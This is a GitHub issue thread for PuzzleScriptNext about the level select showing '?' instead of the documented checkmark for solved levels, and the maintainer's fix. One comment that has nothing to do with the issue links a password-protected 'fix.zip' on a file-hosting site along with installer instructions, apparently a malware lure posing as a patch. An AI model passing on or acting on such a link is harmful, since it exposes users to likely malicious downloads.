### ISSUE TITLE
level_select_solve_symbol defaults to ? not ✓

### ISSUE THREAD

**Issue by Draknek** [david-pfx/PuzzleScriptNext#89]
The documentation for `level_select_solve_symbol` says:
> Which symbol to display for levels that have been solved in the level select. It's a checkmark by default, but you can change it in case you're using a custom_font that doesn't have a checkmark glyph.

However, this seems to be inaccurate: the symbol shown next to solved levels is currently `?` by default. The behaviour described by the documentation is possible if you use the prelude line `level_select_solve_symbol ✓`.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by david-pfx** [comment]
Fixed. Default is now "X", to avoid potential errors from using non-ASCII characters.
